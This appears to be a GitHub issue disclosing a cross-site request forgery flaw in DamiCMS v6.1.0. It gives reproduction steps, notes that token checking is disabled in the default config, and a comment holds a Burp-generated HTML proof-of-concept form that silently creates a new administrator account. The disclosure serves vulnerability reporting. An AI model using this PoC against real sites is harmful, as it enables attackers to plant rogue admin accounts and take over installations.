Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Bug:V6.1.0 Cross-site request forgery(Add admin) #6

Open
possib1e opened this issue Dec 2, 2019 · 1 comment
Open

Bug:V6.1.0 Cross-site request forgery(Add admin) #6

possib1e opened this issue Dec 2, 2019 · 1 comment

Comments

@possib1e
Copy link

possib1e commented Dec 2, 2019

There is an Cross-site request forgery vulnerability in your latest version of the CMS v6.1.0
Download link: "https://www.damicms.com/downes/dami.rar"
Vulnerability trigger point:
http://damicms/admin.php?s=/Admin/doadd
1、Log in as admin

1

2、Choose this part

2

22

3、Capture the package to generate a POC file and run it

3

4、Refresh page has changed

4

5.check source code
There are some codes check token, but as if not take function

5

We find the default /Admin/Conf/config.php
'TOKEN_ON' => false,
Means not user token, so have the Cross-site request forgery vulnerability
52

@possib1e
Copy link
Author

possib1e commented Dec 2, 2019

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/3.cms/damicms/admin.php?s=/Admin/doadd" method="POST">
      <input type="hidden" name="username" value="test2" />
      <input type="hidden" name="password" value="Abc123456" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="Submit" value="�&#183;&#187;�&#138;&#160;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant